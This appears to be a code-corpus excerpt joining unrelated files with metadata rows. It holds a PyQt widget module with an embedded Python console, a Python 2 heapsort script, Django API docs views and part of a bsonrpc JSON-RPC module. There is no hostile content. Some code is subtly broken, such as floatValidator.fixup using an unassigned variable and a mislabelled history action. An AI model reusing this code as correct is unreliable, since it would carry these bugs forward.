keyEvent.modifiers() & QtCore.Qt.ControlModifier)):
self.emit(QtCore.SIGNAL('enterPressed()'))
elif keyEvent.key() == QtCore.Qt.Key_Tab:
keyEvent.accept()
self.emit(QtCore.SIGNAL('tabPressed()'))
else:
QtGui.QTextEdit.keyPressEvent(self, keyEvent)
class HighlightingRule:
def __init__(self, pattern, format):
self.pattern = pattern
self.format = format
class PythonHighlighter(QtGui.QSyntaxHighlighter):
"""
Python Highlighter code borrowed from
http://wiki.python.org/moin/PyQt/Python syntax highlighting
"""
def __init__(self, document):
QtGui.QSyntaxHighlighter.__init__(self, document)
self.document = document
self.highlightingRules = []
STYLES = {
'keyword': self.format('blue'),
'operator': self.format('black'),
'brace': self.format('brown'),
'defclass': self.format('darkBlue', 'bold'),
'string': self.format('magenta'),
'string2': self.format('darkMagenta'),
'comment': self.format('darkGreen', 'italic'),
'self': self.format('black', 'italic'),
'numbers': self.format('purple'),
}
# Python keywords
keywords = [
'and', 'assert', 'break', 'class', 'continue', 'def',
'del', 'elif', 'else', 'except', 'exec', 'finally',
'for', 'from', 'global', 'if', 'import', 'in',
'is', 'lambda', 'not', 'or', 'pass', 'print',
'raise', 'return', 'try', 'while', 'yield',
'None', 'True', 'False',
]
# Python operators
operators = [
'=',
# Comparison
'==', '!=', '<', '<=', '>', '>=',
# Arithmetic
'\+', '-', '\*', '/', '//', '\%', '\*\*',
# In-place
'\+=', '-=', '\*=', '/=', '\%=',
# Bitwise
'\^', '\|', '\&', '\~', '>>', '<<',
]
# Python braces
braces = [
'\{', '\}', '\(', '\)', '\[', '\]',
]
self.tri_single = (QtCore.QRegExp("'''"), 1, STYLES['string2'])
self.tri_double = (QtCore.QRegExp('"""'), 2, STYLES['string2'])
rules = []
# Keyword, operator, and brace rules
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in keywords]
rules += [(r'%s' % o, 0, STYLES['operator'])
for o in operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in braces]
# All other rules
rules += [
# 'self'
(r'\bself\b', 0, STYLES['self']),
# Double-quoted string, possibly containing escape sequences
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
# Single-quoted string, possibly containing escape sequences
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
# 'def' followed by an identifier
(r'\bdef\b\s*(\w+)', 1, STYLES['defclass']),
# 'class' followed by an identifier
(r'\bclass\b\s*(\w+)', 1, STYLES['defclass']),
# From '#' until a newline
(r'#[^\n]*', 0, STYLES['comment']),
# Numeric literals
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b', 0, STYLES['numbers']),
]
# Build a QRegExp for each pattern
self.rules = [(QtCore.QRegExp(pat), index, fmt) for (pat, index, fmt) in rules]
def format(self, color, style=''):
_color = QtGui.QColor()
_color.setNamedColor(color)
_format = QtGui.QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QtGui.QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
def highlightBlock(self, text):
# Do other syntax formatting
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
# We actually want the index of the nth match
index = expression.pos(nth)
length = len(str(expression.cap(nth)))
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0)
# Do multi-line strings
in_multiline = self.match_multiline(text, *self.tri_single)
if not in_multiline:
in_multiline = self.match_multiline(text, *self.tri_double)
def match_multiline(self, text, delimiter, in_state, style):
# If inside triple-single quotes, start at 0
if self.previousBlockState() == in_state:
start = 0
add = 0
# Otherwise, look for the delimiter on this line
else:
start = delimiter.indexIn(text)
# Move past this match
add = delimiter.matchedLength()
# As long as there's a delimiter match on this line...
while start >= 0:
# Look for the ending delimiter
end = delimiter.indexIn(text, start + add)
# Ending delimiter on this line?
if end >= add:
length = end - start + add + delimiter.matchedLength()
self.setCurrentBlockState(0)
# No; multi-line string
else:
self.setCurrentBlockState(in_state)
length = len(str(text)) - start + add
# Apply formatting
self.setFormat(start, length, style)
# Look for the next match
start = delimiter.indexIn(text, start + length)
class PythonConsole(QtGui.QFrame):
import re
findIdentifier = re.compile(r'([a-zA-Z0-9.]*)$')
def __init__(self, *args):
QtGui.QFrame.__init__(self, *args)
# Set layout and split the results field (top) and the command field (bottom)
self.layout = QtGui.QVBoxLayout(self)
self.splitter = QtGui.QSplitter(QtCore.Qt.Vertical, self)
self.splitter.setOpaqueResize(1)
self.layout.addWidget(self.splitter)
# Initialise environment
self.environment = {}
# Build result widget
self.resultWidget = QtGui.QTextEdit(self.splitter)
self.resultWidget.setReadOnly(True)
self.resultWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultWidget.setMinimumHeight(50)
self.resultWidget.setTabStopWidth(20)
self.resultHighlighter = PythonHighlighter(self.resultWidget)
# Insert a welcome message to results
import sys
welcomeMsg = 'Welcome to Python Earthling\n' + sys.version + '\n\n'
self.resultWidget.setText(welcomeMsg)
# Build command widget
self.commandWidget = QCommandEntryWidget(self.splitter)
self.commandWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.commandWidget.setMinimumHeight(28)
self.commandWidget.setTabStopWidth(20)
self.commandHighlighter = PythonHighlighter(self.commandWidget)
self.connect(self.commandWidget, QtCore.SIGNAL('enterPressed()'), self.enterCommand)
self.connect(self.commandWidget, QtCore.SIGNAL('tabPressed()'), self.tabCommand)
# Define text formats
self.normalTextFormat = QtGui.QTextCharFormat()
self.normalTextFormat.setFontWeight(QtGui.QFont.Normal)
self.resultTextFormat = QtGui.QTextCharFormat()
self.resultTextFormat.setForeground(QtGui.QColor(40, 40, 200))
self.resultTextFormat.setFontWeight(QtGui.QFont.Normal)
self.suggestionTextFormat = QtGui.QTextCharFormat()
self.suggestionTextFormat.setForeground(QtGui.QColor(20, 160, 20))
self.suggestionTextFormat.setFontWeight(QtGui.QFont.Normal)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
# Initialise history and set actions to scroll up and down through the history
self.history = []
self.historyPosition = 0
self.previousHistoryAction = QtGui.QAction('Previous History', self)
self.previousHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Up'))
self.nextHistoryAction = QtGui.QAction('Previous History', self)
self.nextHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Down'))
self.previousHistoryAction.triggered.connect(self.previousHistory)
self.nextHistoryAction.triggered.connect(self.nextHistory)
self.commandWidget.addAction(self.previousHistoryAction)
self.commandWidget.addAction(self.nextHistoryAction)
self.buildMenuBar()
# IO redirection
self.stdout = self._Stdout(self.resultWidget)
self.stderr = self._Stderr(self.resultWidget)
self.runCommand('from Ops import Runtime')
self.runCommand('runtime = Runtime.getInstance()')
self.runCommand('interface = runtime.interface')
self.clearHistory()
def buildMenuBar(self):
# Set actions and shortcuts
cutShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Cut).toString()
copyShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Copy).toString()
pasteShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Paste).toString()
self.scriptSaveAction = QtGui.QAction('Save Script...', self)
self.scriptLoadAction = QtGui.QAction('Load Script...', self)
self.scriptSaveHistoryAction = QtGui.QAction('Save History...', self)
self.scriptFetchHistoryAction = QtGui.QAction('Fetch History', self)
self.scriptClearHistoryAction = QtGui.QAction('Clear History', self)
self.scriptSaveAction.triggered.connect(self.saveScript)
self.scriptLoadAction.triggered.connect(self.loadScript)
self.scriptSaveHistoryAction.triggered.connect(self.saveHistory)
self.scriptFetchHistoryAction.triggered.connect(self.fetchHistory)
self.scriptClearHistoryAction.triggered.connect(self.clearHistory)
self.editClearAction = QtGui.QAction('Clear', self)
self.editCutAction = QtGui.QAction('Cut\t%s' % cutShortcut, self)
self.editCopyAction = QtGui.QAction('Copy\t%s' % copyShortcut, self)
self.editPasteAction = QtGui.QAction('Paste\t%s' % pasteShortcut, self)
self.editClearAction.triggered.connect(self.clear)
self.editCutAction.triggered.connect(self.cut)
self.editCopyAction.triggered.connect(self.copy)
self.editPasteAction.triggered.connect(self.paste)
# Create menus
self.menuBar = QtGui.QMenuBar(self)
self.layout.setMenuBar(self.menuBar)
self.scriptMenu = QtGui.QMenu('Script')
self.menuBar.addMenu(self.scriptMenu)
self.scriptMenu.addAction(self.scriptSaveAction)
self.scriptMenu.addAction(self.scriptLoadAction)
self.scriptMenu.addSeparator()
self.scriptMenu.addAction(self.scriptSaveHistoryAction)
self.scriptMenu.addAction(self.scriptFetchHistoryAction)
self.scriptMenu.addAction(self.scriptClearHistoryAction)
self.editMenu = QtGui.QMenu('Edit')
self.menuBar.addMenu(self.editMenu)
self.editMenu.addAction(self.editClearAction)
self.editMenu.addAction(self.editCutAction)
self.editMenu.addAction(self.editCopyAction)
self.editMenu.addAction(self.editPasteAction)
def saveScript(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.commandWidget.toPlainText())
def loadScript(self):
filename = QtGui.QFileDialog.getOpenFileName(self, 'Load Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
commands = file(filename, 'rt').read()
self.commandWidget.clear()
self.commandWidget.setText(commands)
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def historyToString(self):
return '\n'.join(self.history)
def saveHistory(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save History', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.historyToString())
def fetchHistory(self):
self.commandWidget.clear()
self.commandWidget.setText(self.historyToString())
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def clearHistory(self):
self.history = []
def clear(self):
self.resultWidget.clear()
def cut(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.cut()
else:
self.resultWidget.cut()
def copy(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.copy()
else:
self.resultWidget.copy()
def paste(self):
self.commandWidget.paste()
def previousHistory(self):
# Triggered using Alt+Up
# Find the previous (decremented position) in the history and insert it in the right
# place in the command field if available
self.historyPosition = min(self.historyPosition + 1, len(self.history))
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def nextHistory(self):
# Triggered using Alt+Down
# Find the next (incremented position) in the history and insert it in the right
# place in the command field if available
self.historyPosition = max(self.historyPosition - 1, 0)
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def echoCommand(self, command, format=None):
# Print the command to the result field
# Set a default text format if it hasn't been supplied
if format is None: format = self.normalTextFormat
# Split the lines
lines = command.splitlines()
if lines and not lines[-1].strip():
del lines[-1]
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
for line in lines:
textCursor = self.resultWidget.textCursor()
# textCursor.insertText(">> ", format)
textCursor.insertText("%s\n" % line, format)
def enterCommand(self):
# Execute the command as the user just pressed Ctrl-Enter or Ctrl-Return
# Get the position of the text cursor and get the command from the command field
cursor = self.commandWidget.textCursor()
command = str(self.commandWidget.toPlainText())
# Maya behaviour:
# If the user has selected a particular bit of command text we keep it, otherwise
# we clear the command field
if cursor.hasSelection():
start, end = cursor.selectionStart(), cursor.selectionEnd()
command = command[start:end]
else:
self.commandWidget.setText('')
self.commandWidget.textCursor().setPosition(0)
# Echo the command to the result field and execute the command
self.echoCommand(command, format=self.resultTextFormat)
self.runCommand(command)
def tabCommand(self):
# Print command completion if the user presses the tab key
# Create a completer
import rlcompleter, os
completer = rlcompleter.Completer(self.environment)
# Get the text we just wrote and look for the nearest identifier
index = self.commandWidget.textCursor().position()
if index == 0:
text = ''
else:
text = str(self.commandWidget.toPlainText())[:index]
match = self.findIdentifier.search(text)
if match: text = match.group(1)
# Remember the length of the text we wrote for later when we want to
# add to it
textOriginalLength = len(text)
# Try to find all the states (suggestions) available for the command text
# Collect the available options to a list and build a cache to avoid repetitions
options = []
cache = {}
try:
currentState = 0
while True:
result = completer.complete(text, currentState)
currentState += 1
if result is None: break
if cache.has_key(result): continue
cache[result] = True
options.append(result)
except TypeError as e:
print (str(e))
if len(options) == 0: return
# Check it's not the same as what we just wrote
if len(options) == 1 and options[0] != text:
self.commandWidget.insertPlainText(options[0][textOriginalLength:])
else:
commonPrefix = os.path.commonprefix(options)
if len(commonPrefix) > textOriginalLength:
self.commandWidget.insertPlainText(commonPrefix[textOriginalLength:])
self.resultWidget.textCursor().insertText(' '.join(options) + '\n', self.suggestionTextFormat)
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def runCommand(self, command):
# Add the command to history (even if it fails) and only store the last 100 entries
self.history.append(command)
self.history = self.history[-1000:]
self.historyPosition = 0
# Standard streams
import sys
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = self.stdout
sys.stderr = self.stderr
# Evaluate/execute command and report results
try:
result = None
try:
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
result = eval(command, self.environment, self.environment)
except SyntaxError:
exec (command, self.environment)
# Check if the evaluation was successful and if so report it in the results field
# Add the results to the environment
if result is not None:
message = str(result)
self.environment['_'] = message
self.echoCommand(message)
except:
# Get the traceback information and add the formatted output to the results field
import traceback, sys
exceptionType, exception, tb = sys.exc_info()
entries = traceback.extract_tb(tb)
entries.pop(0)
# Build and print a list containing the error report
lines = []
if entries:
lines += traceback.format_list(entries)
lines += traceback.format_exception_only(exceptionType, exception)
for line in lines:
self.echoCommand(line, format=self.errorTextFormat)
finally:
# Restore streams
sys.stdout = old_stdout
sys.stderr = old_stderr
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
class _Stdout:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.stdoutTextFormat = QtGui.QTextCharFormat()
self.stdoutTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.stdoutTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class _Stderr:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.errorTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class QfloatWidget(QtGui.QLineEdit):
''' draggable spin box. ctrl+ left, middle or right button will scrub the values in the spinbox
by different amounts
'''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QfloatWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 0.001
self._dragging = False
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Initialise the current value
self.current_value = None
# Create a new Validator
# dblValidator = QtGui.QDoubleValidator(self)
dbl_validator = floatValidator(self)
self.setValidator(dbl_validator)
# Initialise the Range variables to nothing.
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = float(v) # ensure it's a float!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min, max)
# print ("Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top())))
except:
print ("Inputs to QfloatWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return float(self.text())
def text(self):
ret = super(QfloatWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QvectorWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
def __init__(self, size, parent=None):
super(QvectorWidget, self).__init__(parent)
self.vector = np.zeros(size, dtype=np.float32)
layout = QtGui.QHBoxLayout()
for vi in range(size):
w = QfloatWidget(self)
layout.addWidget(w)
w.valueChanged.connect(functools.partial(self.handleValueChanged, vi), QtCore.Qt.DirectConnection)
layout.setContentsMargins(0, 0, 0, 0)
self.blockSignals = False
self.setLayout(layout)
def handleValueChanged(self, vi, v):
self.vector[vi] = v
if not self.blockSignals:
self.valueChanged.emit(self.vector)
def setValue(self, v):
self.blockSignals = True
self.vector[:] = v
for vi, v in enumerate(self.vector):
self.layout().itemAt(vi).widget().setValue(v)
self.blockSignals = False
class QmatrixWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
'''
this should be replaced with qdatawidget mappers and a proper qt model of the retargetting
data structure
'''
def __init__(self, rows, cols, parent=None):
super(QmatrixWidget, self).__init__(parent)
self.rows = rows
self.cols = cols
self.matrix = np.zeros((rows, cols), dtype=np.float32)
self.blockSignals = False
layout = QtGui.QVBoxLayout()
for ri in range(rows):
row = QvectorWidget(cols, self)
row.valueChanged.connect(functools.partial(self.handleValueChanged, ri), QtCore.Qt.DirectConnection)
layout.addWidget(row)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def handleValueChanged(self, ri, v):
self.matrix[ri, :] = v
if not self.blockSignals:
self.valueChanged.emit(self.matrix)
def setValue(self, v):
self.blockSignals = True
self.matrix[:, :] = v.copy()
for ri, rv in enumerate(self.matrix):
self.layout().itemAt(ri).widget().setValue(rv)
self.blockSignals = False
class QKeySequenceEdit(QtGui.QLineEdit):
''' line edit for capturing key sequences. use in a keyboard shortcut editor (although probably
better as labels on a button rather than a line edit'''
def __init__(self, *args):
super(QKeySequenceEdit, self).__init__(*args)
self.keySequence = None
def setKeySequence(self, keySequence):
self.keySequence = keySequence
self.setText(self.keySequence.toString(QtGui.QKeySequence.NativeText))
def keyPressEvent(self, event):
if event.type() == QtCore.QEvent.KeyPress:
key = event.key()
if key == QtCore.Qt.Key_unknown:
return
# just a modifier? Ctrl, Shift, Alt, Meta.
if key in [QtCore.Qt.Key_Control, QtCore.Qt.Key_Shift, QtCore.Qt.Key_Alt, QtCore.Qt.Key_Meta]:
# print("Single click of special key: Ctrl, Shift, Alt or Meta")
# print("New KeySequence:", QtGui.QKeySequence(key).toString(QtGui.QKeySequence.NativeText))
return
# check for a combination of user clicks
modifiers = event.modifiers()
if modifiers & QtCore.Qt.ShiftModifier: key += QtCore.Qt.SHIFT
if modifiers & QtCore.Qt.ControlModifier: key += QtCore.Qt.CTRL
if modifiers & QtCore.Qt.AltModifier: key += QtCore.Qt.ALT
if modifiers & QtCore.Qt.MetaModifier: key += QtCore.Qt.META
self.setKeySequence(QtGui.QKeySequence(key))
event.accept()
class intValidator(QtGui.QValidator):
def __init__(self, parent=None):
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else int(min)
self.max_value = None if max is None else int(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0 or text == "-": return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
else:
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
value = int(text)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "" or input == "-":
self.parent.setText(str(self.min_value) if self.min_value is not None else 0)
else:
if self.min_value is not None or self.max_value is not None:
value = np.clip(int(input), self.min_value, self.max_value)
self.parent.setText(str(value))
class floatValidator(QtGui.QValidator):
def __init__(self, parent=None):
from re import compile as re_compile
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
# RegExp for a valid number including scientific notation
self._re = re_compile("^[-+]?[0-9]*\.?[0-9]*([eE][-+]?[0-9]*)?$")
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else float(min)
self.max_value = None if max is None else float(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0: return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
if not self._re.match(text):
return (QtGui.QValidator.Invalid)
else:
try:
value = float(text)
except ValueError:
return (QtGui.QValidator.Invalid)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "":
self.parent.setText(str(self.min_value) if self.min_value is not None else 0.0)
else:
try:
value = float(input)
except ValueError: # Error is with an incomplete scientific notation
input = input[:input.find("e")]
value = float(value)
if self.min_value is not None or self.max_value is not None:
value = np.clip(value, self.min_value, self.max_value)
self.parent.setText(str(value))
if __name__ == '__main__':
import sys
# from UI import QAppCtx
app = QtGui.QApplication(sys.argv)
app.setStyle('plastique')
# with QAppCtx():
# dialog = QmatrixWidget(3,4,None)
# def p(*x): print (x)
# dialog.valueChanged.connect(p)
# dialog.setValue(np.eye(3,4))
# dialog.show()
# def modeSelectCB(mode,val):
# print (mode,val)
# options = ['orig','proj','proj_freeze','synth','diff']
# win = Qselect(options = options, default = 'diff', cb = modeSelectCB)
# win.show()
listWidget = QOrderedListWidget(['Hello', 'World', 'this', 'is', 'a', 'test'])
listWidget.setStyleSheet("border:0;")
listWidget.show()
def testCB(*x): print ("Value is: {}".format(x))
slideWidgetHolder = QtGui.QGroupBox()
slideWidget = QslideLimitValue("Test Slider", 0, -180, 180, testCB, "Slider")
# layout = QtGui.QHBoxLayout()
# layout.setContentsMargins(0,0,0,0)
# layout.addWidget(slideWidget.slider)
# layout.addWidget(slideWidget.display)
slideWidgetHolder.setLayout(slideWidget)
slideWidgetHolder.show()
slideWidget2 = QslideLimitControl()
slideWidget2.show()
app.connect(app, QtCore.SIGNAL('lastWindowClosed()'), app.quit)
sys.exit(app.exec_())
|
mit
| -1,527,965,147,184,060,700
| 32.641414
| 135
| 0.714495
| false
| 3.113344
| false
| false
| false
|
samueljackson92/scripts
|
python/heapsort.py
|
1
|
1562
|
# heapsort.py
# Date: 15/06/13
# Author: Samuel Jackson (samueljackson@outlook.com)
# Description: Python implementation of a basic heapsort.
# Based heavily on the example code from http://en.wikipedia.org/wiki/Heapsort
import random
def swap(data, i, j):
temp = data[i]
data[i] = data[j]
data[j] = temp
#convert our data into a max-order heap in place in the array
def heapify(data):
#get position of last parent node in heap
start = (len(data) -1) / 2
while (start >= 0):
#sift down from start such that all nodes below start are then in place
siftDown(data, start, len(data)-1)
start = start -1
#Re-organize the heap from a given point in the list to a given end point
def siftDown(data, start, end):
root = start
#while root has at least one child
while (root * 2 + 1 <= end):
child = root * 2 + 1 #get left child
swapNode = root #keep track of node to swap with
#check if left child needs to be swapped
if(data[swapNode] < data[child]):
swapNode = child
#check if right child exists and needs to be swapped
if(child+1 <= end and data[swapNode] < data[child+1]):
swapNode = child+1
#check if we need to swap
if(swapNode != root):
swap(data, root, swapNode)
root = swapNode
else:
return
def heap_sort(data):
end = len(data) -1
#place data in max heap order
heapify(data)
while (end > 0):
#swap the max element to the end
print ">>", data
swap(data, 0, end)
end = end -1
#re-heapify the data
siftDown(data, 0, end)
d = random.sample(range(30), 10)
print d
heap_sort(d)
print d
|
mit
| -2,002,207,885,747,726,000
| 21.014085
| 78
| 0.677977
| false
| 2.897959
| false
| false
| false
|
DemocracyClub/yournextrepresentative
|
ynr/apps/api/views.py
|
1
|
2639
|
from collections import OrderedDict
from django.views.generic import TemplateView
from rest_framework.request import Request
from drf_yasg import openapi
from drf_yasg.generators import OpenAPISchemaGenerator
from elections.models import Election
class OpenAPISchemaMixin:
version = None
patterns = None
def _sort_ordered_dict_by_keys(self, od):
keys = sorted(list(od.keys()))
new_od = OrderedDict()
for key in keys:
if type(od[key]) == OrderedDict:
od[key] = self._sort_ordered_dict_by_keys(od[key])
new_od[key] = od[key]
return new_od
def get_schema(self):
schema = OpenAPISchemaGenerator(
openapi.Info(
title="Snippets API",
default_version="self.version",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="hello@democracyclub.org.uk"),
license=openapi.License(name="BSD License"),
),
patterns=self.patterns,
version="next",
)
request = Request(self.request)
schema_obj = schema.get_schema(request=request, public=True)
return self._sort_ordered_dict_by_keys(schema_obj)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
context["version"] = self.version
return context
class NextAPIDocsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/next_home.html"
class APIDocsEndpointsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/endpoints.html"
class APIDocsDefinitionsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/definitions.html"
patterns = None
version = "next"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
return context
class CSVListView(TemplateView):
template_name = "api/csv_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
base_qs = Election.objects.all().order_by(
"current", "-election_date", "slug"
)
context["current_elections"] = base_qs.current()
context["future_elections"] = base_qs.future().exclude(current=True)
context["past_elections"] = base_qs.past().exclude(current=True)
return context
class ResultsDocs(TemplateView):
template_name = "api/results.html"
|
agpl-3.0
| -4,075,647,256,769,377,000
| 29.686047
| 76
| 0.63471
| false
| 3.835756
| false
| false
| false
|
seprich/py-bson-rpc
|
bsonrpc/definitions.py
|
1
|
4837
|
# -*- coding: utf-8 -*-
'''
Definitions to match messages to JSON RPC 2.0 schema and to produce them.
Also RPC error definitions.
'''
import six
from bsonrpc.exceptions import (
InternalError, InvalidParams, InvalidRequest, MethodNotFound,
ParseError, ServerError, UnspecifiedPeerError)
from bsonrpc.options import NoArgumentsPresentation
__license__ = 'http://mozilla.org/MPL/2.0/'
class Definitions(object):
def __init__(self, protocol, protocol_version, no_args):
self.protocol = protocol
self.protocol_version = protocol_version
self._no_args = no_args # Strategy to represent no args
def _set_params(self, msg, args, kwargs):
if not args and not kwargs:
if self._no_args == NoArgumentsPresentation.EMPTY_ARRAY:
msg['params'] = []
if self._no_args == NoArgumentsPresentation.EMPTY_OBJECT:
msg['params'] = {}
return msg
if args:
msg['params'] = args
else:
msg['params'] = kwargs
return msg
def request(self, msg_id, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def notification(self, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def ok_response(self, msg_id, result):
return {
self.protocol: self.protocol_version,
'id': msg_id,
'result': result
}
def error_response(self, msg_id, error, details=None):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'error': error
}
if details:
msg['error']['data'] = details
return msg
def _chk_protocol(self, msg):
return msg.get(self.protocol, None) == self.protocol_version
def _has_method(self, msg):
return isinstance(msg.get('method', None), six.string_types)
def _valid_params(self, msg):
return ('params' not in msg or isinstance(msg['params'], (list, dict)))
def is_request(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' in msg and
(msg['id'] is None or
isinstance(msg['id'], (six.string_types, int))) and
self._valid_params(msg))
def is_notification(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' not in msg and
self._valid_params(msg))
def is_response(self, msg):
